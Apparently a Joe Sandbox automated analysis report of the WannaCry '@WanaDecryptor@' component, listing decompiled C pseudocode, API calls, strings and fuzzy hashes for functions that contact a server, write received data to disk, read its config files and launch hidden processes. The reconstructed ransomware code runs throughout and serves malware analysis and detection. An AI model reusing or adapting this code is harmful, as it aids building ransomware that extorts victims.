                                                      • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
                                                      				char _v0;
                                                      				char _v4;
                                                      				char _v8;
                                                      				char _v12;
                                                      				char _v16;
                                                      				char _v20;
                                                      				char _v24;
                                                      				char _v32;
                                                      				char _v34;
                                                      				long _v36;
                                                      				char _v40;
                                                      				char _v48;
                                                      				char _v56;
                                                      				char _v64;
                                                      				char _v65;
                                                      				char _v68;
                                                      				int _v76;
                                                      				char _v77;
                                                      				void* _t57;
                                                      				intOrPtr* _t68;
                                                      				signed int _t76;
                                                      				struct HWND__* _t92;
                                                      				intOrPtr* _t113;
                                                      				intOrPtr* _t114;
                                                      				intOrPtr* _t118;
                                                      				intOrPtr* _t120;
                                                      				long _t133;
                                                      				struct _IO_FILE* _t136;
                                                      				struct HWND__* _t138;
                                                      				signed int _t140;
                                                      				int _t141;
                                                      				intOrPtr _t143;
                                                      				void* _t144;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004142DB);
                                                      				 *[fs:0x0] = _t143;
                                                      				E00413060(0x240c, __ecx,  *[fs:0x0]);
                                                      				_push(_t140);
                                                      				E0040DBB0( &_v0, 0x1000);
                                                      				_a9220 = 0;
                                                      				_push( &_v4);
                                                      				_t141 = _t140 | 0xffffffff;
                                                      				_t57 = E0040BED0(_a9228, _a9232, 0xc);
                                                      				_t144 = _t143 + 0x10;
                                                      				if(_t57 == 0) {
                                                      					_t138 = _a9272;
                                                      					if(_t138 != 0) {
                                                      						SendMessageA(_t138, 0x4e20, 0, 0);
                                                      					}
                                                      					_push(8);
                                                      					_push(_a9240);
                                                      					E0040DC00( &_v0);
                                                      					_v12 = _a9236;
                                                      					_push(4);
                                                      					_push( &_v12);
                                                      					E0040DC00( &_v8);
                                                      					E0040DD00( &_v16, _a9240);
                                                      					E0040DD00( &_v20, _a9240);
                                                      					_push(1);
                                                      					_push( &_v34);
                                                      					_v34 = _a9240;
                                                      					E0040DC00( &_v24);
                                                      					_t133 = _a9220;
                                                      					_push(4);
                                                      					_push( &_v36);
                                                      					_v36 = _t133;
                                                      					E0040DC00( &_v32);
                                                      					_push(_t133);
                                                      					_push(_a9208);
                                                      					E0040DC00( &_v40);
                                                      					_t68 =  *0x422210; // 0xab4238
                                                      					_push(0);
                                                      					_push(E0040DD40( &_v48));
                                                      					_push(E0040DD30( &_v48));
                                                      					_push(7);
                                                      					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
                                                      						if(_t138 != 0) {
                                                      							SendMessageA(_t138, 0x4e21, 0, 0);
                                                      						}
                                                      						_t113 =  *0x422210; // 0xab4238
                                                      						_push( &_v64);
                                                      						_push( &_a4060);
                                                      						_v64 = 0x13ec;
                                                      						_push( &_v65);
                                                      						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
                                                      							if(_v77 == 7) {
                                                      								_t141 = 0;
                                                      								if(_v76 > 0) {
                                                      									_t136 = fopen(_a9200, "wb");
                                                      									_t144 = _t144 + 8;
                                                      									if(_t136 != 0) {
                                                      										fwrite( &_a4048, 1, _v76, _t136);
                                                      										fclose(_t136);
                                                      										_t144 = _t144 + 0x14;
                                                      										_t141 = 1;
                                                      									}
                                                      								}
                                                      							}
                                                      							if(_t138 != 0) {
                                                      								SendMessageA(_t138, 0x4e22, _t141, 0);
                                                      							}
                                                      							_t114 =  *0x422210; // 0xab4238
                                                      							 *((intOrPtr*)( *_t114 + 0xc))();
                                                      							_a9156 = 0xffffffff;
                                                      							L23:
                                                      							E0040DBF0( &_v68);
                                                      							_t76 = _t141;
                                                      						} else {
                                                      							if(_t138 != 0) {
                                                      								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
                                                      							}
                                                      							_t118 =  *0x422210; // 0xab4238
                                                      							 *((intOrPtr*)( *_t118 + 0xc))();
                                                      							_a9156 = 0xffffffff;
                                                      							_t76 = E0040DBF0( &_v68) | 0xffffffff;
                                                      						}
                                                      						goto L24;
                                                      					} else {
                                                      						if(_t138 != 0) {
                                                      							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
                                                      						}
                                                      						_t120 =  *0x422210; // 0xab4238
                                                      						 *((intOrPtr*)( *_t120 + 0xc))();
                                                      						_a9168 = 0xffffffff;
                                                      						_t76 = E0040DBF0( &_v56) | 0xffffffff;
                                                      						L24:
                                                      						 *[fs:0x0] = _a9148;
                                                      						return _t76;
                                                      					}
                                                      				}
                                                      				_t92 = _a9272;
                                                      				if(_t92 != 0) {
                                                      					SendMessageA(_t92, 0x4e20, _t141, 0);
                                                      				}
                                                      				_a9224 = _t141;
                                                      				goto L23;
                                                      			}


                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                                      • fopen.MSVCRT ref: 0040C46B
                                                      • fwrite.MSVCRT ref: 0040C489
                                                      • fclose.MSVCRT ref: 0040C48F
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
                                                      				struct _STARTUPINFOA _v68;
                                                      				struct _PROCESS_INFORMATION _v84;
                                                      				void* _t21;
                                                      				long _t25;
                                                      				DWORD* _t30;
                                                      
                                                      				_v68.cb = 0x44;
                                                      				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
                                                      				_v84.hThread = _t21;
                                                      				_v84.dwProcessId = _t21;
                                                      				_v84.dwThreadId = _t21;
                                                      				_v84.hProcess = 0;
                                                      				_v68.dwFlags = 1;
                                                      				_v68.wShowWindow = 0;
                                                      				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
                                                      					return 0;
                                                      				} else {
                                                      					_t25 = _a8;
                                                      					if(_t25 != 0) {
                                                      						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
                                                      							TerminateProcess(_v84.hProcess, 0xffffffff);
                                                      						}
                                                      						_t30 = _a12;
                                                      						if(_t30 != 0) {
                                                      							GetExitCodeProcess(_v84.hProcess, _t30);
                                                      						}
                                                      					}
                                                      					CloseHandle(_v84);
                                                      					CloseHandle(_v84.hThread);
                                                      					return 1;
                                                      				}
                                                      			}


                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                                      • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                                      Strings
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00401140() {
                                                      				intOrPtr _v4;
                                                      				void* _t17;
                                                      				struct HWND__* _t18;
                                                      				void* _t23;
                                                      				intOrPtr _t24;
                                                      
                                                      				_t23 = _t17;
                                                      				L00412CB0();
                                                      				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
                                                      				_t18 =  *(_t23 + 0x80);
                                                      				SendMessageA(_t18, 0x401, 0, 0x280000);
                                                      				_push(_t18);
                                                      				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
                                                      				_v4 = _t24;
                                                      				L00412CAA();
                                                      				E00401970("Connecting to server...");
                                                      				 *(_t23 + 0xa8) = 0;
                                                      				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
                                                      				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
                                                      					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
                                                      				}
                                                      				return 1;
                                                      			}


                                                      APIs
                                                      • #4710.MFC42 ref: 00401145
                                                      • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                                      • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                                      • #537.MFC42(Connecting to server...), ref: 0040118D
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                                      • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
                                                      Strings
                                                      • Connecting to server..., xrefs: 00401188
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E00407F80(void* __ecx) {
                                                      				struct _IO_FILE* _t24;
                                                      				void* _t30;
                                                      				void* _t37;
                                                      				void* _t38;
                                                      				signed int _t45;
                                                      				signed int _t48;
                                                      				signed int _t51;
                                                      				unsigned int _t53;
                                                      				signed int _t54;
                                                      				void* _t66;
                                                      				struct _IO_FILE* _t76;
                                                      				void* _t77;
                                                      				void* _t78;
                                                      				void* _t79;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t84;
                                                      				void* _t85;
                                                      
                                                      				_t79 = __ecx;
                                                      				 *((char*)(_t81 + 0xc)) = 0;
                                                      				memset(_t81 + 0xd, 0, 0xc << 2);
                                                      				_t82 = _t81 + 0xc;
                                                      				asm("stosb");
                                                      				 *((intOrPtr*)(_t82 + 0x40)) = 0;
                                                      				memset(_t82 + 0x44, 0, 0x21 << 2);
                                                      				_t24 = fopen("00000000.res", "rb");
                                                      				_t76 = _t24;
                                                      				_t84 = _t82 + 0x14;
                                                      				_t89 = _t76;
                                                      				if(_t76 != 0) {
                                                      					fread(_t84 + 0x48, 0x88, 1, _t76);
                                                      					fclose(_t76);
                                                      					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
                                                      					_t45 = _t84 + 0x60;
                                                      					_push(_t84 + 0x2c);
                                                      					_t66 = _t79 + 0x5f0;
                                                      					_push("+++");
                                                      					_push(_t45);
                                                      					_push(_t66);
                                                      					_t30 = E0040C4F0(_t38, _t45, _t89);
                                                      					_t85 = _t84 + 0x30;
                                                      					_t77 = _t30;
                                                      					E0040C670();
                                                      					_t90 = _t77 - 0xffffffff;
                                                      					if(_t77 == 0xffffffff) {
                                                      						_push(_t85 + 0xc);
                                                      						_push("+++");
                                                      						_push(_t85 + 0x40);
                                                      						_push(_t66);
                                                      						_t37 = E0040C4F0(_t38, _t45, _t90);
                                                      						_t85 = _t85 + 0x10;
                                                      						_t77 = _t37;
                                                      					}
                                                      					_t24 = E0040C670();
                                                      					if(_t77 == 1) {
                                                      						_t24 = 0;
                                                      						asm("repne scasb");
                                                      						_t48 =  !(_t45 | 0xffffffff) - 1;
                                                      						if(_t48 >= 0x1e) {
                                                      							asm("repne scasb");
                                                      							_t51 =  !(_t48 | 0xffffffff) - 1;
                                                      							if(_t51 < 0x32) {
                                                      								asm("repne scasb");
                                                      								_t53 =  !(_t51 | 0xffffffff);
                                                      								_t78 = _t85 + 0xc - _t53;
                                                      								_t54 = _t53 >> 2;
                                                      								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
                                                      								return E00401A10(_t79 + 0x50c, 0);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t24;
                                                      			}

                                                      APIs
                                                      • fopen.MSVCRT ref: 00407FBD
                                                      • fread.MSVCRT ref: 00407FDD
                                                      • fclose.MSVCRT ref: 00407FE4
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                                        • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy$fclosefopenfread
                                                      • String ID: +++$00000000.res$s.wnry
                                                      • API String ID: 3363958884-869915597
                                                      • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                                      • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00401220(void* __ecx, long _a4) {
                                                      				long _t11;
                                                      				void* _t26;
                                                      
                                                      				_t11 = _a4;
                                                      				_t26 = __ecx;
                                                      				if(_t11 != 0x3e9) {
                                                      					L8:
                                                      					L00412CBC();
                                                      					return _t11;
                                                      				}
                                                      				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
                                                      					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
                                                      					KillTimer( *(_t26 + 0x20), 0x3e9);
                                                      					L00412B66();
                                                      				}
                                                      				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
                                                      					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
                                                      				}
                                                      				_t11 =  *(_t26 + 0xa0);
                                                      				if(_t11 == 0) {
                                                      					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
                                                      					if(_t11 == 0xf) {
                                                      						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
                                                      					}
                                                      				}
                                                      				goto L8;
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                                      • KillTimer.USER32(?,000003E9), ref: 0040125E
                                                      • #4853.MFC42 ref: 00401266
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                                      • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                                      • #2379.MFC42 ref: 004012C4
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#2379#4853KillTimer
                                                      • String ID:
                                                      • API String ID: 178170520-0
                                                      • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                                      • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00403860(void* __ecx) {
                                                      				int _t6;
                                                      				long _t7;
                                                      				void* _t9;
                                                      				void* _t14;
                                                      
                                                      				_t14 = __ecx;
                                                      				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
                                                      				_push(0);
                                                      				if(_t6 != 0xffffffff) {
                                                      					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
                                                      					if(_t7 != 0) {
                                                      						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
                                                      						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
                                                      						 *(_t14 + 0xf4) = _t9;
                                                      						return _t9;
                                                      					}
                                                      					return _t7;
                                                      				} else {
                                                      					_push(0);
                                                      					_push("Please select a host to decrypt.");
                                                      					L00412CC8();
                                                      					return _t6;
                                                      				}
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                                      • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                                      • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                                      Strings
                                                      • Please select a host to decrypt., xrefs: 00403885
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1200CreateThread
                                                      • String ID: Please select a host to decrypt.
                                                      • API String ID: 3616405048-3459725315
                                                      • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                                      • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 81%
                                                      			E004044C0(void* __ecx, long _a4) {
                                                      				struct tagLOGFONTA _v72;
                                                      				long _t10;
                                                      				struct HFONT__* _t13;
                                                      				struct HWND__* _t15;
                                                      				void* _t21;
                                                      
                                                      				_t10 = _a4;
                                                      				_t21 = __ecx;
                                                      				if(_t10 != 0) {
                                                      					L2:
                                                      					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
                                                      					_v72.lfUnderline = 1;
                                                      					_t13 = CreateFontIndirectA( &_v72);
                                                      					_push(_t13);
                                                      					L00412D5E();
                                                      					 *((char*)(_t21 + 0x58)) = 1;
                                                      					return _t13;
                                                      				}
                                                      				_t15 = GetParent( *(__ecx + 0x20));
                                                      				_push(_t15);
                                                      				L00412DAC();
                                                      				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
                                                      				_push(_t10);
                                                      				L00412DE2();
                                                      				if(_t10 != 0) {
                                                      					goto L2;
                                                      				}
                                                      				return _t10;
                                                      			}

                                                      APIs
                                                      • GetParent.USER32(?), ref: 004044D2
                                                      • #2864.MFC42(00000000), ref: 004044D9
                                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                      • #2860.MFC42(00000000), ref: 004044EF
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                      • CreateFontIndirectA.GDI32(?), ref: 00404513
                                                      • #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 2724197214-0
                                                      • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                                      • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E0040C060(void* __ecx, void* __eflags) {
                                                      				void* _t35;
                                                      				int _t45;
                                                      				struct HWND__* _t56;
                                                      				signed int _t58;
                                                      				int _t59;
                                                      				intOrPtr* _t65;
                                                      				intOrPtr* _t69;
                                                      				intOrPtr* _t70;
                                                      				intOrPtr* _t73;
                                                      				intOrPtr* _t75;
                                                      				struct HWND__* _t87;
                                                      				intOrPtr _t92;
                                                      				void* _t93;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004142BB);
                                                      				 *[fs:0x0] = _t92;
                                                      				E00413060(0x2408, __ecx,  *[fs:0x0]);
                                                      				_push(_t58);
                                                      				E0040DBB0(_t92 + 0x18, 0x1000);
                                                      				 *(_t92 + 0x241c) = 0;
                                                      				_push(_t92 + 0x14);
                                                      				_t59 = _t58 | 0xffffffff;
                                                      				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
                                                      				_t93 = _t92 + 0x10;
                                                      				if(_t35 == 0) {
                                                      					_t87 =  *(_t93 + 0x2430);
                                                      					if(_t87 != 0) {
                                                      						SendMessageA(_t87, 0x4e20, 0, 0);
                                                      					}
                                                      					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
                                                      					_t65 =  *0x422210; // 0xab4238
                                                      					_push(0);
                                                      					_push(E0040DD40(_t93 + 0x1c));
                                                      					_push(E0040DD30(_t93 + 0x20));
                                                      					_push(7);
                                                      					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
                                                      						if(_t87 != 0) {
                                                      							SendMessageA(_t87, 0x4e21, 0, 0);
                                                      						}
                                                      						_t69 =  *0x422210; // 0xab4238
                                                      						_push(_t93 + 0x10);
                                                      						_push(_t93 + 0x102c);
                                                      						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
                                                      						_push(_t93 + 0x17);
                                                      						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
                                                      							if( *((char*)(_t93 + 0xf)) == 7) {
                                                      								_t59 = 0;
                                                      							}
                                                      							if(_t87 != 0) {
                                                      								SendMessageA(_t87, 0x4e22, _t59, 0);
                                                      							}
                                                      							_t70 =  *0x422210; // 0xab4238
                                                      							 *((intOrPtr*)( *_t70 + 0xc))();
                                                      							 *(_t93 + 0x241c) = 0xffffffff;
                                                      							goto L21;
                                                      						} else {
                                                      							if(_t87 != 0) {
                                                      								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
                                                      							}
                                                      							_t73 =  *0x422210; // 0xab4238
                                                      							 *((intOrPtr*)( *_t73 + 0xc))();
                                                      							 *(_t93 + 0x241c) = 0xffffffff;
                                                      							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                                      						}
                                                      					} else {
                                                      						if(_t87 != 0) {
                                                      							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
                                                      						}
                                                      						_t75 =  *0x422210; // 0xab4238
                                                      						 *((intOrPtr*)( *_t75 + 0xc))();
                                                      						 *(_t93 + 0x241c) = 0xffffffff;
                                                      						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
                                                      					}
                                                      				} else {
                                                      					_t56 =  *(_t93 + 0x2430);
                                                      					if(_t56 != 0) {
                                                      						SendMessageA(_t56, 0x4e20, _t59, 0);
                                                      					}
                                                      					 *(_t93 + 0x241c) = _t59;
                                                      					L21:
                                                      					E0040DBF0(_t93 + 0x14);
                                                      					_t45 = _t59;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
                                                      				return _t45;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
